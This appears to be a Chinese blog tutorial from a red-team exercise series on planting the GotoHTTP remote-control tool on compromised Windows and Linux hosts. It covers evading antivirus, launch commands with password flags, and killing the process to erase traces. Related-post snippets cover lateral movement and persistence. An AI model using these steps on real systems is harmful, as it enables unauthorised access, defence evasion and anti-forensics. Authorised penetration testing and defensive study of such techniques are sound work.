《实战攻防演练》五、利用GotoHTTP软件远控获取权限

已于 2023-11-04 22:16:04 修改
阅读量563 收藏 1
点赞数 1
分类专栏: 实战攻防演练 文章标签: 网络安全
于 2023-11-03 09:33:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45170890/article/details/134196070
版权

前言

在面对杀毒软件阻挡的情况下,如果无法直接使用Webshell获取目标Windows机器的控制权限,可以考虑使用远程控制软件关掉杀毒软件

GotoHTTP远控

软件地址:https://cn.gotohttp.com/
在这里插入图片描述

环境:windows 10 有杀软,关闭自带防火墙,使用火绒(亲测可绕火绒那个垃圾,360有限制绕不过去)

windows上线主机

上传gotohttp.exe到目标站点,start GotoHTTP.exe 后生成gotohttp.ini配置文件

img

打开后就是该配置文件

img

输入远控id和key

img即可连接远控

img

linux上线主机

上传gotohttp文件,在获取到root权限下,给文件赋予执行权限后,执行命令

sudo ./gotohttp -p 自定义密码 -f 0 -m 1

参数详情

GotoHTTP支持以下参数: 	

 -p <pass> 设置用户密码
 -f <1|0> 允许/禁止 文件传输
 -m <1|0> 允许/禁止 多人同时控制(不建议使用,降低性能)
 -b <1|0> 是否尝试使用Framebuffer模式(不建议使用)

img执行后稍等一下,会显示出id和密码

img

问题思考-实战后续处理

使用gotohttp执行后,在实战中会暴露一些问题

1.默认页面

执行后会直接远程控制,如果有显示锁屏界面,默认如下所示

img

2.留痕迹

运行后默认桌面会显示ip,容易被溯源

imgimg

解决方案:当结束工作后,windows后台GotoHTTP进程默认还是启动中,需要清理痕迹关闭进程

taskkill /f /t /im “GotoHTTP.exe”,后续在删除exe文件即可

img

「已注销」
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网渗透(三十二)之横向移动篇-利用远控工具GoToHTTP横向移动
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-15 442
GotoHTTP工作在B2C模式。使用远程控制时,您不必在每一台电脑上都安装远程软件。不管身处何处,有浏览器就能访问远程电脑。即使公司网络管控,仍然可以控制或被控制。支持文件传输、无人值守、剪切板同步、远程语音、远程摄像头、多显示器支持GoToHTTP下载。
【安卓端-GotoHttpgotohttp.apk
03-19
GotoHTTP安卓版版的安装包是标准的APK文件,请将它下载到安卓手机或设备上,并点击安装。需要的注意的是,使用GotoHTTP安卓设备是免ROOT的,但是对于未被ROOT的安卓设备,需要执行一些操作后使用,请查看这里(http://www.gotohttp.com/goto/help/android.12x)。
内网远程控制——gotohttp
星星我啊,已经很努力在学习了, 有人一起学习吗?Ziansec-1
02-08 404
gotohttp在我的渗透测试过程中,是一个常见的方式,给我的感觉,即用即连,浏览器连接,方便快捷。但是缺点就是权限划分明确,普通用户权限起的gotohttp无法进行管理员权限操作,比如关闭windows defender和其他一些行为,不过在规避杀软这儿也有奇效。
实战 | 无视杀软使用远控工具进行横向移动Tips
代码讲故事
04-22 910
实战 | 无视杀软使用远控工具进行横向移动Tips。 在有杀软拦截,CS无法上线的情况下,经常用到todesk和向日葵这两个远控工具进行横向移动。不过这两个工具现在好像不怎么好用了。不过无所谓,用其他的就是了,听说最近GotoHTTP很火,可以试试看。
GOTO
ATGC的专栏
09-26 944
/* * $Id: LocalGoto.java,v 1.5 2005/05/09 11:52:44 blowagie Exp $ * $Name: $ * * This code is part of the iText Tutorial. * You can find the complete tutorial at the following address:
无视杀软登录远程服务器GoToHTTP
weixin_74245209的博客
06-26 755
在渗透测试中,我们会遇到服务器装有杀软导致提权木马上传不成功的问题。gotohttp.exe目录下直接生成了配置文件。上gotohttp官网直接输入name,tmp。这里给各位师傅另外提供一种思路。即可上线,随机关闭杀软后续提权。执行命令启动被控文件。
安恒网络安全实战攻防演练应对指南.pdf
05-07
安恒网络安全实战攻防演练应对指南.pdf
攻防演练方案相关的附件模板
07-02
收集整理的攻防演练方案过程中,相关的附件整理模板,附件一:攻防演练授权委托书;附件二:攻防演练保密协议;附件三:防守方评分标准;附件四:攻击方评分标准;附件:攻击过程简报;附件六:防守工作简报;
网络安全攻防演练服务实施方案和实施计划
06-02
近年来,随着国家级/省级HW行动的开展并取得良好成效,各行各业都希望开展自己的攻防演练活动,完善自身的安全防护能力,践行“没有网络安全就没有国家安全”的号召。本文档提供了攻防演练实施方案和实施计划参考...
2023安天网络安全实战攻防演练专题集.pdf
07-23
"2023安天网络安全实战攻防演练专题集" 本资源摘要信息涵盖了2023安天网络安全实战攻防演练专题集的主要内容,包括网络安全实战攻防演练的目的、方法和技术。该资源涵盖了网络安全领域的多个方面,包括威胁情报、...
实战攻防演习组织服务(紫队)解决方案.pptx
11-22
实战攻防演习是指组织单位组织协调多支攻击队,利用实战攻防演习平台接入保证攻击的安全性的前提下,对多家防守单位的真实的生产环境进行模拟网络攻击的攻防对抗的演习活动。该解决方案旨在帮助组织单位提高其安全...
嵌入式linux 网络唤醒,GotoHTTP
weixin_32035057的博客
05-11 428
网络唤醒网络唤醒原理网络唤醒Wake-On-LAN(WOL),是通过软硬结合的技术实现远程开机。它发送经过特别编码的数据包给能响应这些数据包的系统,这个数据包被称为魔术包。支持网络唤醒的电脑在关闭状态时,它的网卡仍然是有电的,并且在监听网络上的魔术包。就是这个特性实现的远程开机功能。这种远程开机方案的好处是它可以打开网络内的任何支持该功能的计算机。WOL的局限性, 以及GotoHTTP是如何工作的...
GotoHTTP内网穿透体验
m0_46490129的博客
07-27 653
不同于传统C2C模式的远程控制工具,GotoHTTP工作在B2C模式。使用远程控制时,您不必在每一台电脑上都安装远程软件。即使公司网络管控,仍然可以控制或被控制。支持文件传输、无人值守、剪切板同步、远程语音、远程摄像头、多显示器支持。在有杀软拦截,CS无法上线的情况下,经常用到todesk和向日葵这两个远控工具进行横向移动。首先个人感觉该工具就是大概跟向日葵之类的远程工具一样,但是比较新出来,可能各大公司还未采集到该工具的流量或者特征暂时是处于免杀阶段。[漏洞404] 学习文章。作者 | 漏洞404。
内网渗透之权限维持-黄金白银票据&隐藏账户&远控-RustDesk&GotoHTTP
m0_62207170的博客
05-18 912
内网渗透之权限维持-黄金白银票据&隐藏账户&远控-RustDesk&GotoHTTP
利用远控工具GoToHTTP横向移动
2302_76986722的博客
09-29 182
GotoHTTP工作在B2C模式。使用远程控制时,您不必在每一台电脑上都安装远程软件。不管身处何处,有浏览器 就能访问远程电脑。即使公司网络管控,仍然可以控制或被控制。支持文件传输、无人值守、剪切板同步、远程语 音、远程摄像头、多显示器支持。使用cs或者其他工具将文件上传到目标机器。查看配置文件里面有连接地址和账号密码。在运行目录下会生成一个配置文件。
gotohttp出网连接横向移动
qq_64787896的博客
03-24 193
2.在msfconsole接口运行Gotohttp_x64.exe文件。3.运行之后在同级目录下会生成gotohttp.ini文件。5.访问host,输入name和tmp,连接成功。4.type读取gotohttp.ini文件。1.将gotohttp上传到目标主机。设备:Win12,本地主机。
windows权限维持—黄金白银票据&隐藏用户&远控&RustDesk&GotoHttp
剁椒鱼头没剁椒的博客
08-16 1703
总的来说隐藏用户目前的手段基本上服务器出现问题,第一件事都是查询隐藏用户,所以这个算是后门的一种方式,但是现在再来看已经不是那么好用了。这个工具存在一个问题就是有网络的情况下才能够使用,而在无网络的情况下是无法使用的,同时流量是走https协议,需要目标主机开放443端口。简单来说就是:有网络,无限制,可以使用。有网络,如果防火墙限制了443端口,无法使用。无网络,无限制,可以使用,但是可能需要转发,比较麻烦。无网络,有限制,基本上就是无法使用。
内网渗透ToDesk、GoToHTTP、RustDESK横向移动利用流程笔记
最新发布
m0_73062138的博客
06-10 882
内网渗透之ToDesk、GoToHTTP、RustDESK横向移动利用流程
攻防演练会花多长时间?
07-13
攻防演练的时间长度可以因不同的因素而有所变化。一般来说,攻防演练的时间取决于以下几个因素: 1. 演练目的:如果是进行基础的演练和测试,可能只需要几个小时或一天的时间。而如果是进行更复杂、全面的演练,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值